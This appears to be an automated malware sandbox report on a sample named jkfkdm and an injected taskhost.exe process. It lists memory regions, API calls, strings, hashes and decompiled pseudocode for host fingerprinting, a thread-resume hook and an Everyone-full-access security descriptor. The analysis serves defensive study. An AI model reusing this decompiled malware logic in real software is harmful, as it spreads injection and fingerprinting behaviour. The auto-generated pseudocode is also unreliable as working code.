Instruction Fuzzy Hash: 05D1E075A183818FD364CF29C080B9AFBE1BFD8314F15895EE99D97361E771A841CB82

Uniqueness

Uniqueness Score: 100.00%

Function 01251826, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 225
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 012518F9
VirtualProtect.KERNELBASE ref: 012519B9
VirtualProtect.KERNELBASE ref: 01251CA0

Strings

Cy, xrefs: 01251855

Memory Dump Source

Source File: 00000012.00000002.517110914.01250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1250000_jkfkdm.jbxd

Similarity

API ID: ProtectVirtual
String ID: Cy
API String ID: 544645111-3008677793
Opcode ID: dcc0fc18b1c3e47c9403ac0ff838c80563365132d21f877ed104bbd84896e068
Instruction ID: ba35f5681d649233f7060a57391b61cee25ca96cddd252cef2a16937dd2d0540
Opcode Fuzzy Hash: dcc0fc18b1c3e47c9403ac0ff838c80563365132d21f877ed104bbd84896e068
Instruction Fuzzy Hash: A6B1E375A183818FD368CF29C08079AFBE1BFC8314F15891EE9D997361E730A841CB82

Uniqueness

Uniqueness Score: 100.00%

Function 01252D3A, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 148
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 01252E41

Strings

fg(, xrefs: 01252DD0

Memory Dump Source

Source File: 00000012.00000002.517110914.01250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1250000_jkfkdm.jbxd

Similarity

API ID: AllocVirtual
String ID: fg(
API String ID: 4275171209-1623029493
Opcode ID: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction ID: e0bf6788d3d179a4d309bec80265a52dea0102f71917f5f5fd6c43906ba918b5
Opcode Fuzzy Hash: ff81fc3ebf4ceace7e9ecac7a11187996e8646a851cbfc2bd2b4a2004e1f028d
Instruction Fuzzy Hash: F361BCB5A193818FD348DF29C18065AFBF1BFC8714F11991EE8889B351E3B5E845CB86

Uniqueness

Uniqueness Score: 100.00%

Function 01252593, Relevance: 1.6, APIs: 1, Instructions: 118
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012526B9

Memory Dump Source

Source File: 00000012.00000002.517110914.01250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1250000_jkfkdm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction ID: a0a05a4a38fe22f65d16eec546934bfd0babb91effb080c0259a8bf898bca09c
Opcode Fuzzy Hash: 94079a8d7e0a8657ffb95dabc3fff951ac91d831d766877d761f4c9ab4c9426f
Instruction Fuzzy Hash: A651BB79A19380CFC3A8CF28C19075AFBE2BFC9714F54892EE99997350D771A841CB42

Uniqueness

Uniqueness Score: 0.02%

Function 0125273A, Relevance: 1.6, APIs: 1, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012526B9
GetProcAddress.KERNELBASE ref: 012527AE

Memory Dump Source

Source File: 00000012.00000002.517110914.01250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1250000_jkfkdm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction ID: 470984c132b62881bbcd1c96841ef390986f7724703b1af36cb1594b37628549
Opcode Fuzzy Hash: d8878856bc08774b7035ebf957fb3061181c92b3f836b43baccf40fc95fb68ef
Instruction Fuzzy Hash: D931FF76A28341CFC768CF69C19065AF7E2BFD8714F15891EE99997380D770A804CF82

Uniqueness

Uniqueness Score: 0.01%

Function 012525B6, Relevance: 1.6, APIs: 1, Instructions: 67
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 012526B9

Memory Dump Source

Source File: 00000012.00000002.517110914.01250000.00000040.00000001.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1250000_jkfkdm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction ID: 0a5fb7cedc9bf58d141af1eff5bee171601208c5c64ba86f09d02a558666b99e
Opcode Fuzzy Hash: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction Fuzzy Hash: 6F21BF74A19341CFC7A8CF28D19075ABBE1BBC8714F50492EFA9A97390D770A840CB42

Uniqueness

Uniqueness Score: 0.02%

Non-executed Functions

Analysis Process: taskhost.exe PID: 1432 Parent PID: 2600 taskhost.exeUNIQUE

Executed Functions

Function 015E9EC0, Relevance: 70.5, APIs: 31, Strings: 9, Instructions: 482
stringlibraryloaderUNIQUELIBRARYCODECrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E015E9EC0(void* __ecx, void* __fp0, struct _OSVERSIONINFOA* _a4, struct HINSTANCE__* _a8, WCHAR* _a12, signed int _a16) {
				WCHAR* _v8;
				union _SID_NAME_USE _v12;
				WCHAR* _v16;
				long _v20;
				WCHAR* _v24;
				long _v28;
				long _v32;
				WCHAR* _v36;
				short _v564;
				char _v628;
				long _v632;
				char _v3140;
				intOrPtr _t145;
				void** _t147;
				signed int _t149;
				signed int _t150;
				signed int _t157;
				int _t188;
				intOrPtr _t192;
				intOrPtr _t199;
				short _t201;
				signed int _t204;
				signed int _t206;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				WCHAR* _t266;
				WCHAR* _t296;
				WCHAR* _t299;
				WCHAR* _t357;
				void* _t373;
				void* _t375;
				void* _t377;
				void* _t387;
				void* _t389;
				void* _t396;

				_t396 = __fp0;
				_v28 = 0;
				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				_v8 = 0;
				E015E5F70(__ecx, _a4, 0, 0x1ed8);
				 *((intOrPtr*)(_a4 + 0x1a54)) = GetCurrentProcessId();
				E015E7050(GetTickCount() +  *((intOrPtr*)(_a4 + 0x1a54)), _a4 + 0xa5c);
				_t375 = _t373 + 0x14;
				if(GetModuleFileNameW(0, _a4 + 0x1a58, 0x105) != 0) {
					__eflags = _a4 + 0x1a58;
					_t145 = E015E6900(_a4 + 0x1a58, _a4 + 0x1a58, 0x5c);
					_t375 = _t375 + 8;
					 *((intOrPtr*)(_a4 + 0x1c64)) = _t145;
				} else {
					while(0 != 0) {
					}
				}
				_t147 = E015E9290(GetCurrentProcess()); // executed
				 *(_a4 + 0x104) = _t147;
				_t257 =  *( *(_a4 + 0x104));
				_t149 = E015E9440( *( *(_a4 + 0x104)));
				_t377 = _t375 + 8;
				__eflags = _t149;
				if(_t149 == 0) {
					_t150 = E015E9330(_t257); // executed
					__eflags = _t150;
					if(_t150 <= 0) {
						 *((intOrPtr*)(_a4 + 0x408)) = 1;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								goto L18;
							}
						}
					} else {
						 *((intOrPtr*)(_a4 + 0x408)) = 2;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
					}
				} else {
					 *((intOrPtr*)(_a4 + 0x408)) = 3;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
				}
				L18:
				 *(_a4 + 0x40c) = _a8;
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				_v28 = 0x80;
				_v20 = 0x80;
				_t157 = LookupAccountSidW(0,  *( *(_a4 + 0x104)), _a4 + 0x208,  &_v28, _a4 + 0x308,  &_v20,  &_v12); // executed
				__eflags = _t157;
				if(_t157 == 0) {
					_v32 = GetLastError();
					__eflags = _a4 + 0x308;
					E015E6090(_a4 + 0x308, 0x80, L"LookupAccountSidW() err %u", _v32);
					_t377 = _t377 + 0x10;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L25;
						}
					}
				}
				L25:
				__eflags = _a16 & 0x00000002;
				if((_a16 & 0x00000002) == 0) {
					__eflags = _a16 & 0x00000004;
					if((_a16 & 0x00000004) == 0) {
						_t266 = _a4 + 0x410;
						__eflags = _t266;
						GetModuleFileNameW( *(_a4 + 0x40c), _t266, 0x20a);
					} else {
						_v16 = _a12;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						lstrcpynW(_a4 + 0x410, _v16, 0x105);
						 *0x16000c8 = _v16[0x17f];
						 *0x16000cc = _v16[0x183];
						 *0x16000d0 = _v16[0x185];
						 *0x16000d4 = _v16[0x189];
						 *0x16000d8 = _v16[0x18b];
						 *0x16000dc = _v16[0x18f];
						 *0x16000e0 = _v16[0x191];
						 *0x16000e4 = _v16[0x195];
						 *0x16000e8 = _v16[0x197];
						 *0x16000ec = _v16[0x19b];
					}
				} else {
					_v8 = _a12;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					lstrcpynW(_a4 + 0x410, _v8, 0x20a);
				}
				 *((intOrPtr*)(_a4 + 0x61c)) = E015E6900(__eflags, _a4 + 0x410, 0x5c);
				lstrcpynW(_a4 + 0xc4, E015E6900(__eflags, _a4 + 0x410, 0x5c), 0x40);
				 *((short*)(_a4 + 0xbc + lstrlenW(_a4 + 0xc4) * 2)) = 0;
				E015E6C40(_a4 + 0xc4, _a4 + 0xc4, _a4 + 0xa4, 0x20);
				E015E6950(_a4 + 0x410, _a4 + 0x620);
				lstrcpynW(_a4 + 0x850, _a4 + 0x620, 0x105);
				lstrcatW(_a4 + 0x850, "\\");
				lstrcatW(_a4 + 0x850, _a4 + 0xc4);
				_v36 = E015E6660(_a4 + 0xc4, 0x188c);
				lstrcatW(_a4 + 0x850, _v36);
				E015E6890( &_v36);
				E015E69F0(__eflags, _a4 + 0x82a, 0xa, 0xf, _a4 + 0xa5c);
				_t188 = lstrlenA(_a4 + 0xa4);
				__eflags = _a4 + 0xa4;
				E015EBD30(_a4 + 0xa4, _t396, E015E7340(_a4 + 0xa4, _t188, 0), _a4 + 0x1420);
				_t192 = E015E94C0(GetCurrentProcess()); // executed
				_t387 = _t377 + 0x54;
				 *((intOrPtr*)(_a4 + 0x1430)) = _t192;
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				E015E5F70(0, _a4, 0, 0x9c);
				_a4->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_a4);
				 *((intOrPtr*)(_a4 + 0x1dac)) = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				_t199 = E015E9E00(_a4); // executed
				 *((intOrPtr*)(_a4 + 0xa0)) = _t199;
				_push( *((intOrPtr*)(_a4 + 0xa0))); // executed
				_t201 = E015E9E30(); // executed
				_t389 = _t387 + 0x10;
				 *((short*)(_a4 + 0x9c)) = _t201;
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				_t204 = GetWindowsDirectoryW(_a4 + 0x1434, 0x104);
				__eflags = _t204;
				if(_t204 != 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L48;
						}
					}
				} else {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
				}
				L48:
				_t206 = GetEnvironmentVariableW(L"SystemRoot",  &_v564, 0x104);
				__eflags = _t206;
				if(_t206 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t357 = _a4 + 0x1434;
					__eflags = _t357;
					SetEnvironmentVariableW(L"SystemRoot", _t357);
				}
				_t209 = GetEnvironmentVariableW(L"USERPROFILE", _a4 + 0x1848, 0x209);
				__eflags = _t209;
				if(_t209 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_push("TEMP");
					E015E6090(_a4 + 0x1848, 0x20a, L"%s\\%s", _a4 + 0x1434);
					_t389 = _t389 + 0x14;
					_t299 = _a4 + 0x1848;
					__eflags = _t299;
					SetEnvironmentVariableW(L"USERPROFILE", _t299);
				}
				_t210 = GetEnvironmentVariableW(L"TEMP", _a4 + 0x163e, 0x20a);
				__eflags = _t210;
				if(_t210 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t296 = _a4 + 0x1848;
					__eflags = _t296;
					SetEnvironmentVariableW(L"TEMP", _t296);
				}
				_t211 = GetEnvironmentVariableA("SystemDrive",  &_v628, 0x3f);
				__eflags = _t211;
				if(_t211 == 0) {
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					SetEnvironmentVariableA("SystemDrive", "C:");
				}
				_v632 = 0x7f;
				GetComputerNameW(_a4 + 0x1db0,  &_v632);
				E015E7050(E015E7340(_a4 + 0x1420, lstrlenA(_a4 + 0x1420), 0),  &_v3140);
				__eflags = _a4 + 0x1c68;
				E015E7300( &_v3140,  &_v3140, _a4 + 0x1c68, 0x20);
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				__eflags = _a4 + 0x1c88;
				E015E69F0(_a4 + 0x1c88, _a4 + 0x1c88, 0x14, 0x1e,  &_v3140);
				while(1) {
					__eflags = 0;
					if(0 == 0) {
						break;
					}
				}
				__eflags = _a16 & 0x00000001;
				if((_a16 & 0x00000001) == 0) {
					 *((intOrPtr*)(_a4 + 0x1ca8)) = E015E9AF0();
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L74;
						}
					}
				}
				L74:
				return 1;
			}

0x015e9ec0
0x015e9ec9
0x015e9ed0
0x015e9ed7
0x015e9ede
0x015e9ee5
0x015e9ef7
0x015e9f08
0x015e9f28
0x015e9f2d
0x015e9f49
0x015e9f58
0x015e9f5f
0x015e9f64
0x015e9f6a
0x015e9f4b
0x015e9f4b
0x015e9f4f
0x015e9f51
0x015e9f77
0x015e9f82
0x015e9f91
0x015e9f94
0x015e9f99
0x015e9f9c
0x015e9f9e
0x015e9fb5
0x015e9fba
0x015e9fbc
0x015e9fd6
0x015e9fe0
0x015e9fe0
0x015e9fe2
0x00000000
0x00000000
0x015e9fe4
0x015e9fbe
0x015e9fc1
0x015e9fcb
0x015e9fcb
0x015e9fcd
0x00000000
0x00000000
0x015e9fcf
0x015e9fd1
0x015e9fa0
0x015e9fa3
0x015e9fad
0x015e9fad
0x015e9faf
0x00000000
0x00000000
0x015e9fb1
0x015e9fb3
0x015e9fe6
0x015e9fec
0x015e9ff2
0x015e9ff2
0x015e9ff4
0x00000000
0x00000000
0x015e9ff6
0x015e9ff8
0x015e9fff
0x015ea033
0x015ea039
0x015ea03b
0x015ea043
0x015ea057
0x015ea05e
0x015ea063
0x015ea066
0x015ea066
0x015ea068
0x00000000
0x00000000
0x015ea06a
0x015ea066
0x015ea06c
0x015ea06f
0x015ea072
0x015ea0a1
0x015ea0a4
0x015ea16b
0x015ea16b
0x015ea17c
0x015ea0aa
0x015ea0ad
0x015ea0b0
0x015ea0b0
0x015ea0b2
0x00000000
0x00000000
0x015ea0b4
0x015ea0c9
0x015ea0d8
0x015ea0e6
0x015ea0f5
0x015ea104
0x015ea112
0x015ea121
0x015ea130
0x015ea13e
0x015ea14d
0x015ea15c
0x015ea15c
0x015ea074
0x015ea077
0x015ea07a
0x015ea07a
0x015ea07c
0x00000000
0x00000000
0x015ea07e
0x015ea093
0x015ea093
0x015ea199
0x015ea1bf
0x015ea1da
0x015ea1f7
0x015ea212
0x015ea233
0x015ea247
0x015ea261
0x015ea274
0x015ea285
0x015ea28f
0x015ea2ae
0x015ea2cb
0x015ea2d5
0x015ea2e5
0x015ea2f4
0x015ea2f9
0x015ea302
0x015ea308
0x015ea308
0x015ea30a
0x00000000
0x00000000
0x015ea30c
0x015ea319
0x015ea324
0x015ea32e
0x015ea34e
0x015ea354
0x015ea35c
0x015ea36b
0x015ea36c
0x015ea371
0x015ea377
0x015ea37e
0x015ea37e
0x015ea380
0x00000000
0x00000000
0x015ea382
0x015ea392
0x015ea398
0x015ea39a
0x015ea3a4
0x015ea3a4
0x015ea3a6
0x00000000
0x00000000
0x015ea3a8
0x015ea39c
0x015ea39c
0x015ea39c
0x015ea39e
0x00000000
0x00000000
0x015ea3a0
0x015ea3a2
0x015ea3aa
0x015ea3bb
0x015ea3c1
0x015ea3c3
0x015ea3c5
0x015ea3c5
0x015ea3c7
0x00000000
0x00000000
0x015ea3c9
0x015ea3ce
0x015ea3ce
0x015ea3da
0x015ea3da
0x015ea3f3
0x015ea3f9
0x015ea3fb
0x015ea3fd
0x015ea3fd
0x015ea3ff
0x00000000
0x00000000
0x015ea401
0x015ea403
0x015ea425
0x015ea42a
0x015ea430
0x015ea430
0x015ea43c
0x015ea43c
0x015ea456
0x015ea45c
0x015ea45e
0x015ea460
0x015ea460
0x015ea462
0x00000000
0x00000000
0x015ea464
0x015ea469
0x015ea469
0x015ea475
0x015ea475
0x015ea489
0x015ea48f
0x015ea491
0x015ea493
0x015ea493
0x015ea495
0x00000000
0x00000000
0x015ea497
0x015ea4a3
0x015ea4a3
0x015ea4a9
0x015ea4c4
0x015ea4f7
0x015ea504
0x015ea511
0x015ea519
0x015ea519
0x015ea51b
0x00000000
0x00000000
0x015ea51d
0x015ea52d
0x015ea534
0x015ea53c
0x015ea53c
0x015ea53e
0x00000000
0x00000000
0x015ea540
0x015ea545
0x015ea548
0x015ea552
0x015ea558
0x015ea558
0x015ea55a
0x00000000
0x00000000
0x015ea55c
0x015ea558
0x015ea55e
0x015ea566

APIs

GetCurrentProcessId.KERNEL32 ref: 015E9EFF
GetTickCount.KERNEL32(?), ref: 015E9F18
GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 015E9F41
GetCurrentProcess.KERNEL32 ref: 015E9F70
LookupAccountSidW.ADVAPI32(00000000,?,?,00000080,?,00000080,?), ref: 015EA033
GetLastError.KERNEL32 ref: 015EA03D
lstrcpynW.KERNEL32(?,00000000,0000020A), ref: 015EA093
lstrcpynW.KERNEL32(?,00000000,00000105), ref: 015EA0C9
GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 015EA17C
lstrcpynW.KERNEL32(?,00000000,?,00000040), ref: 015EA1BF
lstrlenW.KERNEL32(?,?,00000040), ref: 015EA1CF
lstrcpynW.KERNEL32(?,?,00000105,?,?,?,?,?,?,00000040), ref: 015EA233
lstrcatW.KERNEL32(?,015F139C), ref: 015EA247
lstrcatW.KERNEL32(?,?), ref: 015EA261
lstrcatW.KERNEL32(?,?), ref: 015EA285
lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 015EA2CB
GetCurrentProcess.KERNEL32 ref: 015EA2ED
GetVersionExA.KERNEL32(?), ref: 015EA32E
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 015EA33E
GetProcAddress.KERNEL32(00000000), ref: 015EA345
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 015EA392
GetEnvironmentVariableW.KERNEL32(SystemRoot,?,00000104), ref: 015EA3BB
SetEnvironmentVariableW.KERNEL32(SystemRoot,?), ref: 015EA3DA
GetEnvironmentVariableW.KERNEL32(USERPROFILE,?,00000209), ref: 015EA3F3
SetEnvironmentVariableW.KERNEL32(USERPROFILE,?), ref: 015EA43C
GetEnvironmentVariableW.KERNEL32(TEMP,?,0000020A), ref: 015EA456
SetEnvironmentVariableW.KERNEL32(TEMP,?), ref: 015EA475
GetEnvironmentVariableA.KERNEL32(SystemDrive,?,0000003F), ref: 015EA489
SetEnvironmentVariableA.KERNEL32(SystemDrive,015F8138), ref: 015EA4A3
GetComputerNameW.KERNEL32(?,0000007F), ref: 015EA4C4
lstrlenA.KERNEL32(?,00000000,?), ref: 015EA4DD

Strings

TEMP, xrefs: 015EA403
IsWow64Process, xrefs: 015EA334
SystemRoot, xrefs: 015EA3B6, 015EA3D5
SystemDrive, xrefs: 015EA484, 015EA49E
kernel32, xrefs: 015EA339
USERPROFILE, xrefs: 015EA3EE, 015EA437
TEMP, xrefs: 015EA451, 015EA470
%s\%s, xrefs: 015EA412
LookupAccountSidW() err %u, xrefs: 015EA04A

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: EnvironmentVariable$lstrcpyn$CurrentModuleNameProcesslstrcatlstrlen$File$AccountAddressComputerCountDirectoryErrorHandleLastLookupProcTickVersionWindows
String ID: %s\%s$IsWow64Process$LookupAccountSidW() err %u$SystemDrive$SystemRoot$TEMP$TEMP$USERPROFILE$kernel32
API String ID: 2722344402-164610414
Opcode ID: 23b8176ffbfb074861fa677eb5e4b4984de81cbd345a56ebfc648381c46e6c3f
Instruction ID: 8c54e10f1a9f7a5ebbf385c12724cee14c6007ef35626db4a5cd807c660fba26
Opcode Fuzzy Hash: 23b8176ffbfb074861fa677eb5e4b4984de81cbd345a56ebfc648381c46e6c3f
Instruction Fuzzy Hash: 51128FB4E00205ABEB18DF64DC49FAA3BF5FF94348F048128FA199F285D675E640CB95

Uniqueness

Uniqueness Score: 100.00%

Function 015D940B, Relevance: 4.5, APIs: 3, Instructions: 35
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E015D940B(void* _a4, long* _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v32;
				long _t13;
				void* _t17;

				E015E5F70(_t17,  &_v32, 0, 0x1c);
				if(NtQueryInformationThread(_a4, 0,  &_v32, 0x1c, 0) != 0 || _v24 != GetCurrentProcessId() || E015DC0C9(_t17, _a4, _v20, 1) == 0) {
					_t13 = NtResumeThread(_a4, _a8); // executed
					return _t13;
				} else {
					return 0;
				}
			}

0x015d9419
0x015d9436
0x015d9461
0x00000000
0x015d9457
0x00000000
0x015d9457

APIs

NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 015D942E
GetCurrentProcessId.KERNEL32 ref: 015D9438
NtResumeThread.NTDLL(?,?), ref: 015D9461

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: Thread$CurrentInformationProcessQueryResume
String ID:
API String ID: 3036698416-0
Opcode ID: 054b9d923baa4b9c0bc57d739d7dbe730e9d510a3a9d5920edc0d6446bdd4012
Instruction ID: 48f28115332a29077c003b6eb4a721a123b323227ef171bae923713adbfa6e7d
Opcode Fuzzy Hash: 054b9d923baa4b9c0bc57d739d7dbe730e9d510a3a9d5920edc0d6446bdd4012
Instruction Fuzzy Hash: AAF03671A4020ABBEF21AAB4DC05F9E3B69BB10744F004420FA14AC096E7B1D5659791

Uniqueness

Uniqueness Score: 3.75%

Function 004C0000, Relevance: .4, Instructions: 368COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.756698544.004C0000.00000020.00000001.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4c0000_taskhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43f1239b1c907a17b7b69d06b76b96fddfba00e9416a6a794915966bc9ff5d82
Instruction ID: 0a2e3c18e7abb1a7799fef10162ecc9132377e7e31b8ed84656d4900933f1549
Opcode Fuzzy Hash: 43f1239b1c907a17b7b69d06b76b96fddfba00e9416a6a794915966bc9ff5d82
Instruction Fuzzy Hash: AC12A178E05219CFCB58CF98C994BADBBB2BF89304F248199D809AB355C734AD81CF55

Uniqueness

Uniqueness Score: 0.00%

Function 015E95D0, Relevance: 18.2, APIs: 12, Instructions: 182
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E015E95D0(void* __ecx) {
				intOrPtr _v8;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				void* _v20;
				int _v24;
				void* _v32;
				int _v36;
				int _v40;
				intOrPtr _v52;
				int _v56;
				intOrPtr _v60;
				void* _v64;
				intOrPtr _v68;
				int _v72;
				intOrPtr _v84;
				int _v88;
				char _v92;
				void* _v96;
				struct _ACL* _v100;
				void* _v104;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				struct _SID_IDENTIFIER_AUTHORITY _v112;
				intOrPtr _t67;

				_v104 = 0;
				_v24 = 1;
				_v112.Value = 0;
				_v111 = 0;
				_v110 = 0;
				_v109 = 0;
				_v108 = 0;
				_v107 = 0xf;
				_v16.Value = 0;
				_v15 = 0;
				_v14 = 0;
				_v13 = 0;
				_v12 = 0;
				_v11 = 1;
				_v100 = 0;
				_v96 = 0;
				_v20 = 0;
				E015E5F70(__ecx,  &_v92, 0, 0x20);
				if(AllocateAndInitializeSid( &_v16, 1, 0, 0, 0, 0, 0, 0, 0, 0,  &_v20) != 0) {
					_v92 = 0x1fffff;
					_v88 = 2;
					_v84 = 3;
					_v72 = 0;
					_v68 = 5;
					_v64 = _v20;
					if( *0x15fe21c != 6 ||  *0x15fe220 < 2) {
						if( *0x15fe21c < 0xa) {
							goto L15;
						}
						goto L7;
					} else {
						L7:
						if(AllocateAndInitializeSid( &_v112, 2, 2, 1, 0, 0, 0, 0, 0, 0,  &_v96) != 0) {
							while(0 != 0) {
							}
							if(_v96 > 0) {
								_v60 = 0x1fffff;
								_v56 = 2;
								_v52 = 3;
								_v40 = 0;
								_v36 = 2;
								_v32 = _v96;
								_v24 = _v24 + 1;
							}
							L15:
							while(0 != 0) {
							}
							_t67 =  *0x1602cf8(_v24,  &_v92, 0,  &_v100); // executed
							_v8 = _t67;
							if(_v8 == 0) {
								_v104 = LocalAlloc(0x40, 0x14);
								if(_v104 != 0) {
									if(InitializeSecurityDescriptor(_v104, 1) != 0) {
										if(SetSecurityDescriptorDacl(_v104, 1, _v100, 0) != 0) {
											while(0 != 0) {
											}
											if(_v96 != 0) {
												FreeSid(_v96);
											}
											FreeSid(_v20);
											return _v104;
										}
										while(0 != 0) {
										}
										L38:
										if(_v96 != 0) {
											FreeSid(_v96);
										}
										if(_v20 != 0) {
											FreeSid(_v20);
										}
										if(_v104 != 0) {
											LocalFree(_v104);
										}
										if(_v100 != 0) {
											LocalFree(_v100);
										}
										return _v104;
									}
									while(0 != 0) {
									}
									goto L38;
								}
								while(0 != 0) {
								}
								goto L38;
							}
							while(0 != 0) {
							}
							goto L38;
						}
						while(0 != 0) {
						}
						goto L38;
					}
				}
				while(0 != 0) {
				}
				goto L38;
			}

0x015e95d6
0x015e95dd
0x015e95e4
0x015e95e8
0x015e95ec
0x015e95f0
0x015e95f4
0x015e95f8
0x015e95fc
0x015e9600
0x015e9604
0x015e9608
0x015e960c
0x015e9610
0x015e9614
0x015e961b
0x015e9622
0x015e9631
0x015e965b
0x015e9668
0x015e966f
0x015e9676
0x015e967d
0x015e9684
0x015e968e
0x015e9698
0x015e96aa
0x00000000
0x00000000
0x00000000
0x015e96ac
0x015e96ac
0x015e96ce
0x015e96db
0x015e96df
0x015e96e5
0x015e96e7
0x015e96ee
0x015e96f5
0x015e96fc
0x015e9703
0x015e970d
0x015e9716
0x015e9716
0x00000000
0x015e9719
0x015e971d
0x015e972d
0x015e9733
0x015e973a
0x015e974e
0x015e9755
0x015e976d
0x015e978b
0x015e9795
0x015e9799
0x015e979f
0x015e97a5
0x015e97a5
0x015e97af
0x00000000
0x015e97b5
0x015e978d
0x015e9791
0x015e97ba
0x015e97be
0x015e97c4
0x015e97c4
0x015e97ce
0x015e97d4
0x015e97d4
0x015e97de
0x015e97e4
0x015e97e4
0x015e97ee
0x015e97f4
0x015e97f4
0x00000000
0x015e97fa
0x015e976f
0x015e9773
0x00000000
0x015e9775
0x015e9757
0x015e975b
0x00000000
0x015e975d
0x015e973c
0x015e9740
0x00000000
0x015e9742
0x015e96d0
0x015e96d4
0x00000000
0x015e96d6
0x015e9698
0x015e965d
0x015e9661
0x00000000

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 015E9653
AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000002,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 015E96C6
SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,00000000), ref: 015E972D
LocalAlloc.KERNEL32(00000040,00000014), ref: 015E9748
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 015E9765
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 015E9783
FreeSid.ADVAPI32(00000000), ref: 015E97A5
FreeSid.ADVAPI32(00000000), ref: 015E97AF
FreeSid.ADVAPI32(00000000), ref: 015E97C4
FreeSid.ADVAPI32(00000000), ref: 015E97D4
LocalFree.KERNEL32(00000000), ref: 015E97E4
LocalFree.KERNEL32(00000000), ref: 015E97F4

Memory Dump Source

